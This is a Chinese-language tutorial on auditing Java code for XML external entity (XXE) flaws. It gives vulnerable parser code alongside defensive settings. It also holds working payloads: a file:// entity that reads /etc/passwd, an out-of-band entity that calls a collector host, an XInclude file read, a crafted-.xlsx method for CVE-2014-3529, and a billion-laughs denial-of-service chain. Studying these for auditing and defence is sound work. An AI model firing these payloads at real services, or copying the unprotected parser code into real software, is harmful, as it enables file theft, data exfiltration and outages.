Java代码审计之XXE漏洞详解

前言

XXE（XML External Entity）即XML外部实体注入漏洞，是Java代码审计中常见的安全问题。本文将从漏洞原理、代码分析、利用方式到防御措施进行全面讲解。

漏洞简介

XXE漏洞发生在应用程序解析XML输入时，允许引用外部实体。攻击者通过构造恶意XML内容，可能导致：

• 任意文件读取
• 系统命令执行
• 内网端口探测
• 内网网站攻击

有回显的XXE

漏洞代码示例

public String xxeDocumentBuilderReturn(HttpServletRequest request) {
    try {
        String xml_con = WebUtils.getRequestBody(request);
        System.out.println(xml_con);

        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        DocumentBuilder db = dbf.newDocumentBuilder();
        StringReader sr = new StringReader(xml_con);
        InputSource is = new InputSource(sr);
        Document document = db.parse(is);  // parse xml

        // 遍历xml节点name和value
        StringBuffer buf = new StringBuffer();
        NodeList rootNodeList = document.getChildNodes();
        for (int i = 0; i < rootNodeList.getLength(); i++) {
            Node rootNode = rootNodeList.item(i);
            NodeList child = rootNode.getChildNodes();
            for (int j = 0; j < child.getLength(); j++) {
                Node node = child.item(j);
                buf.append(node.getNodeName() + ": " + node.getTextContent() + "\n");
            }
        }
        sr.close();
        System.out.println(buf.toString());
        return buf.toString();
    } catch (Exception e) {
        System.out.println(e);
        return "except";
    }
}

关键解析代码

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
StringReader sr = new StringReader(xml_con);
InputSource is = new InputSource(sr);
Document document = db.parse(is);

攻击Payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

无回显的XXE

漏洞代码差异

无回显代码多了一个节点类型判断：

if (child.item(j).getNodeType() == Node.ELEMENT_NODE) {
    result.append(node.getNodeName() + ": " + node.getFirstChild().getNodeValue() + "\n");
}

无回显验证方法

使用DNS或HTTP请求外带数据：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE joychou [
    <!ENTITY xxe SYSTEM "http://ip.port.xxxx.ceye.io/xxe_test">
]>
<root>&xxe;</root>

XInclude攻击

什么是XInclude

XInclude是XML中包含其他文件的方式，类似于PHP的include。

漏洞代码

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setXIncludeAware(true);   // 支持XInclude
dbf.setNamespaceAware(true);  // 支持XInclude

攻击Payload

<?xml version="1.0" ?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
    <xi:include href="file:///E:/1.txt" parse="text"/>
</root>

Poi ooxml XXE

CVE-2014-3529

1. 新建xxe.xlsx文件，修改后缀名为xxe.zip并解压
2. 修改[Content-Types].xml文件：

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://xxxxx.xx.ixxo"> ]>
<x>&xxe;</x>

3. 重新压缩为zip并改回xlsx后缀
4. 上传文件触发漏洞

CVE-2017-5644

在xl/workbook.xml中注入实体，造成拒绝服务攻击：

<!DOCTYPE x [     
    <!ENTITY e1 "">
    <!ENTITY e2 "&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;">
    <!ENTITY e3 "&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;">
    <!ENTITY e4 "&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;">
    <!ENTITY e5 "&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;&e4;">
    <!ENTITY e6 "&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;&e5;">
    <!ENTITY e7 "&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;&e6;">
    <!ENTITY e8 "&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;&e7;">
    <!ENTITY e9 "&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;&e8;">
    <!ENTITY e10 "&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;&e9;">
    <!ENTITY e11 "&e10;&e10;&e10;&e10;&e10;&e10;&e10;&e10;&e10;&e10;&e10;&e10;&e10;&e10;&e10;&e10;">
]>
<x>&e11;</x>

代码审计技巧

查找以下关键字：

• javax.xml.parsers.DocumentBuilderFactory
• javax.xml.parsers.SAXParser
• javax.xml.transform.TransformerFactory
• javax.xml.validation.Validator
• javax.xml.validation.SchemaFactory
• javax.xml.transform.sax.SAXTransformerFactory
• javax.xml.transform.sax.SAXSource
• org.xml.sax.XMLReader
• org.xml.sax.helpers.XMLReaderFactory
• org.dom4j.io.SAXReader
• org.jdom.input.SAXBuilder
• org.jdom2.input.SAXBuilder
• javax.xml.bind.Unmarshaller
• javax.xml.xpath.XpathExpression
• javax.xml.stream.XMLStreamReader
• org.apache.commons.digester3.Digester

XXE防御措施

一般防护

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

XInclude防护

dbf.setXIncludeAware(true);   // 支持XInclude
dbf.setNamespaceAware(true);  // 支持XInclude
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

参考资源

1. XXE基础知识
2. Java安全代码示例
3. XXE高级利用技巧
4. Apache Solr XXE漏洞分析